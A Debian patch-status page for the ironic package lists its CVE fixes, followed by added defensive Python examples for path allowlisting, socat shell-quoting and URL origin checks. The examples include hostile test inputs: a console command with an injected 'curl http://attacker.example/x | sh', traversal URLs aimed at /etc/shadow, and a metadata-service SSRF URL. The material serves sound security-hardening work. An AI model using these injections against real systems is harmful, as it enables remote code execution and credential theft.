Debian Patches
Status for ironic/1:21.1.0-3+deb12u1
| Patch | Description | Author | Forwarded | Bugs | Origin | Last update |
|---|---|---|---|---|---|---|
| adds-alembic.ini-in-MANIFEST.in.patch | Fixes MANIFEST.in so that alembic.ini is packaged | Thomas Goirand <zigo@debian.org> | no | | | 2016-03-22 |
| py3.11_fix_unit_tests.patch | Fix unit tests for Python 3.11. Mocks can no longer be provided as the specs for other Mocks. See https://github.com/python/cpython/issues/87644 and https://docs.python.org/3.11/whatsnew/3.11.html for more info. | Riccardo Pittau <elfosardo@gmail.com> | no | debian | upstream, https://review.opendev.org/c/openstack/ironic/+/866861 | 2022-12-09 |
| CVE-2025-44021_OSSA-2025-001_Disallow_unsafe_image_file_paths.patch | CVE-2025-44021 / OSSA-2025-001: Disallow unsafe image file:// paths. Before this change, Ironic did not filter file:// paths when used as an image source except to ensure they were a file (and not, e.g., a character device). This is problematic from a security perspective because you could end up with config files from well-known paths being written to disk on a node. The allowlist default list is huge, but it includes all known usages of file:// URLs across Bifrost, Ironic, Metal3, and OpenShift in both CI and default configuration. For the backportable version of this patch for stable branches, we have omitted the unconditional block of system paths in order to permit operators using those branches to fully disable the new security functionality. | Jay Faulkner <jay@jvf.cc> | yes | debian upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/949176 | 2025-03-12 |
| CVE-2026-42510_Shell-quote_console_command_passed_to_socat.patch | CVE-2026-42510: Shell-quote console command passed to `socat`. Applies shell quoting to the console command passed to `socat`'s EXEC:. | Afonne-CID <afonnepaulc@gmail.com> | yes | debian upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/986418 | 2026-04-22 |
| CVE-2026-42997_OSSN-2026-010_validate_molds_url_against_swift_in_keystone_catalog.patch | CVE-2026-42997 / OSSN-2026-010: security: validate molds url against swift in keystone catalog. Adds a security check to ensure the URL "netloc", i.e. hostname and port, matches the user-supplied URL if the configuration molds feature for Dell hardware goes down the path of attempting to get or set the URL. This works by sending the URL to the authorization code and handling checking the URL there as a safety check prior to proceeding. | Julia Kreger <juliaashleykreger@gmail.com> | yes | debian upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/986817 | 2026-05-07 |
| CVE-2026-44916_Use_sandbox_rendering_for_jinja2.patch | CVE-2026-44916: security: Use sandbox rendering for jinja2. Analysis revealed that a malicious attacker with sufficient access to request a node to be provisioned could supply a maliciously crafted kickstart template configuration, which would then be rendered in an unsafe form ultimately. This is because the underlying render utility was modeled for rendering only admin-supplied files or the in-code tree files. Anaconda had to take this further by allowing the jinja utilized to be user supplied. Anyhow, an attacker with sufficient access, an ironic deployment with the anaconda deploy interface, a node with the anaconda deployment interface set by an admin, and a malicious template could result in conductor internal data being rendered and, if the infrastructure operator is allowing traffic egress for the provisioning network, could have sensitive internal data exfiled out of the environment. The render helper has been changed to utilize a sandboxed environment. Attacks such as this now internally raise a Jinja2 SecurityError. | Julia Kreger <juliaashleykreger@gmail.com> | yes | upstream | upstream, https://review.opendev.org/c/openstack/ironic/+/987778 | 2026-05-08 |
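The CVE-2025-44021 row above describes replacing "is it a regular file?" with an allowlist of permitted `file://` source paths (plus, upstream, an unconditional block of system paths). The following is an added example of that kind of check, written here for illustration; it is not ironic's code, and the allowlist, denylist, and URLs are constructed. It canonicalises both sides of every comparison and matches on path-segment boundaries, which are the two places such checks usually go wrong.

```python
"""Allowlisting file:// image sources (added example, not ironic's code).

ALLOWED_IMAGE_DIRS / DENIED_SYSTEM_DIRS are constructed for illustration;
the real ironic defaults are much larger and live in its configuration.
"""
import os
from urllib.parse import urlsplit, unquote

# Constructed: directories an operator has approved as image sources.
ALLOWED_IMAGE_DIRS = ("/var/lib/ironic/images", "/opt/images")
# Constructed: system paths that are never a legitimate image source
# (the "unconditional block of system paths" kept upstream but dropped
# from the stable backport so operators can disable the check entirely).
DENIED_SYSTEM_DIRS = ("/etc", "/proc", "/sys", "/dev", "/root", "/home")


def _canonical(path: str) -> str:
    """Canonicalise for comparison: collapse '..' everywhere and resolve
    symlinks where the path exists. Every side of every comparison goes
    through this, so a /var -> /private/var style symlink cannot desync
    the candidate from the allowlist entries."""
    return os.path.realpath(os.path.normpath(path))


def _inside(path: str, directory: str) -> bool:
    """True when path is strictly below directory. commonpath() compares on
    path-segment boundaries, so /opt/images_evil is not inside /opt/images
    and the directory itself does not count as an image file."""
    if path == directory:
        return False
    return os.path.commonpath([path, directory]) == directory


def file_url_allowed(url: str,
                     allowed=ALLOWED_IMAGE_DIRS,
                     denied=DENIED_SYSTEM_DIRS) -> bool:
    """Decide whether a file:// image source may be read from the conductor."""
    parts = urlsplit(url)
    if parts.scheme != "file":
        return False
    # file://host/path carries an authority component; accept only the
    # empty-host form file:///path (this also refuses file://localhost/...).
    if parts.netloc:
        return False
    # Percent-decode before normalising so %2e%2e cannot smuggle '..' past
    # normpath, then insist on an absolute path.
    raw_path = unquote(parts.path)
    if not raw_path.startswith("/"):
        return False
    path = _canonical(raw_path)
    # Denylist wins over allowlist, mirroring the upstream "unconditional block".
    if any(_inside(path, _canonical(d)) for d in denied):
        return False
    # A production check would additionally require os.path.isfile(path);
    # omitted so the example runs without those files present.
    return any(_inside(path, _canonical(d)) for d in allowed)


if __name__ == "__main__":
    for candidate in (
        "file:///var/lib/ironic/images/ubuntu.qcow2",
        "file:///etc/passwd",
        "file:///var/lib/ironic/images/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow",
        "file:///opt/images_evil/x.qcow2",
        "file://evil.example/var/lib/ironic/images/x.qcow2",
    ):
        print(f"{file_url_allowed(candidate)!s:5}  {candidate}")
```

The denylist is checked before the allowlist on purpose: an operator who accidentally allowlists `/` still cannot have `/etc/shadow` read, which is the property the upstream unconditional block provides and the backport deliberately gives up.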
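The CVE-2026-42510 row says only that the console command handed to `socat`'s `EXEC:` is now shell-quoted. The following added example (not ironic's code; the exact socat address layout is an assumption, and the console commands are constructed) shows why that matters when the command line is assembled as a string that a shell will parse: without quoting, a `;` or `|` in the console command ends the `socat` invocation and starts a new one; with `shlex.quote` the shell delivers the whole string as a single `EXEC:` argument.

```python
"""Shell-quoting a console command spliced into a socat EXEC: address.

Added example, not ironic's code. The socat address layout is assumed;
the point is raw interpolation versus shlex.quote().
"""
import shlex


def build_socat_cmdline_unsafe(port: int, console_cmd: str) -> str:
    """Vulnerable pattern: the console command is interpolated raw into a
    command line that a shell will later parse."""
    return (f"socat TCP4-LISTEN:{port},reuseaddr,fork "
            f"EXEC:{console_cmd},pty,stderr")


def build_socat_cmdline_safe(port: int, console_cmd: str) -> str:
    """Hardened pattern: shlex.quote() single-quotes the command (escaping
    any embedded single quote), so the shell hands socat exactly one EXEC:
    argument whatever the string contains."""
    return (f"socat TCP4-LISTEN:{int(port)},reuseaddr,fork "
            f"EXEC:{shlex.quote(console_cmd)},pty,stderr")


def shell_tokens(cmdline: str) -> list:
    """Tokenise as a POSIX shell would, keeping control operators (; | &
    and friends) as separate tokens so injected ones become visible."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


SHELL_OPERATORS = {";", "|", "&", "&&", "||", "(", ")", "<", ">", ">>"}


def exec_argument_is_intact(cmdline: str, console_cmd: str) -> bool:
    """True when the shell would see no control operators and exactly one
    EXEC: word that still carries the whole console command."""
    tokens = shell_tokens(cmdline)
    if any(t in SHELL_OPERATORS for t in tokens):
        return False
    exec_tokens = [t for t in tokens if t.startswith("EXEC:")]
    return len(exec_tokens) == 1 and console_cmd in exec_tokens[0]


# Constructed inputs: a plausible IPMI SOL console command, then the same
# command with a trailing injection as an attacker controlling the node's
# console settings might supply.
BENIGN_CMD = "ipmitool -I lanplus -H 10.0.0.5 -U admin -f /tmp/pw sol activate"
MALICIOUS_CMD = BENIGN_CMD + "; curl http://attacker.example/x | sh"


if __name__ == "__main__":
    for name, build in (("unsafe", build_socat_cmdline_unsafe),
                        ("safe", build_socat_cmdline_safe)):
        line = build(4000, MALICIOUS_CMD)
        print(f"{name}: intact={exec_argument_is_intact(line, MALICIOUS_CMD)}")
        print("  tokens:", shell_tokens(line))
```

Quoting is the right fix when a string must be produced for a shell; when the caller controls the spawn, the stronger option is to pass an argv list (`["socat", "TCP4-LISTEN:...", f"EXEC:{console_cmd},pty,stderr"]`) to the process API without a shell, since socat itself splits the `EXEC:` program on whitespace and no shell ever sees the operators.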
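The CVE-2026-42997 row describes checking that the "netloc" (host and port) of a user-supplied molds URL matches the Swift endpoint from the Keystone catalog before the conductor fetches or writes it. The following added example (not ironic's molds code; the catalog endpoint and every URL below are constructed) shows one way to compare origins so that default ports, case, scheme downgrades and `user@host` tricks are all handled rather than a bare string prefix match.

```python
"""Comparing a user-supplied object URL against the catalog's Swift endpoint.

Added example, not ironic's code. SWIFT_ENDPOINT and all URLs are constructed.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def _origin(url: str):
    """Return (scheme, hostname, effective port) for a URL.

    parts.hostname is already lower-cased and is taken from after any
    'user:pass@' prefix, so 'https://swift.example:8080@attacker.example/'
    yields attacker.example, not the catalog host.
    """
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        raise ValueError(f"unsupported or host-less URL: {url!r}")
    # parts.port raises ValueError on a malformed port, which the caller
    # treats as a mismatch rather than letting it through.
    port = parts.port if parts.port is not None else DEFAULT_PORTS[parts.scheme]
    return parts.scheme, parts.hostname, port


def url_matches_catalog_endpoint(user_url: str, catalog_url: str) -> bool:
    """True only when scheme, host and effective port of user_url equal those
    of the catalog's Swift endpoint; anything else is refused."""
    try:
        return _origin(user_url) == _origin(catalog_url)
    except ValueError:
        return False


def molds_url_or_raise(user_url: str, catalog_url: str) -> str:
    """Gate the get/set path on the catalog check and return the URL unchanged
    when it passes, so callers cannot forget to consult the result."""
    if not url_matches_catalog_endpoint(user_url, catalog_url):
        raise PermissionError(
            f"molds URL {user_url!r} does not target the catalog Swift endpoint")
    return user_url


# Constructed: what a Keystone catalog lookup for object-store might return.
SWIFT_ENDPOINT = "https://swift.example:8080/v1/AUTH_7f3c"


if __name__ == "__main__":
    for candidate in (
        "https://swift.example:8080/v1/AUTH_7f3c/molds/bios.json",
        "https://SWIFT.example:8080/v1/AUTH_7f3c/molds/bios.json",
        "https://swift.example/v1/AUTH_7f3c/molds/bios.json",
        "http://swift.example:8080/v1/AUTH_7f3c/molds/bios.json",
        "https://169.254.169.254/latest/meta-data/",
        "https://swift.example:8080@attacker.example/v1/x",
    ):
        print(f"{url_matches_catalog_endpoint(candidate, SWIFT_ENDPOINT)!s:5}  {candidate}")
```

The comparison deliberately ignores the path: the check is about where the conductor will connect, and what it is authorised to do with that object is Swift's job once the request carries the user's token.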
All known versions for source package 'ironic'
- 1:35.0.1-3 (sid, forky)
- 1:29.0.5-0+deb13u1 (trixie-proposed-updates)
- 1:29.0.0-7 (trixie)
- 1:21.1.0-3+deb12u1 (bookworm-proposed-updates)
- 1:21.1.0-3 (bookworm)
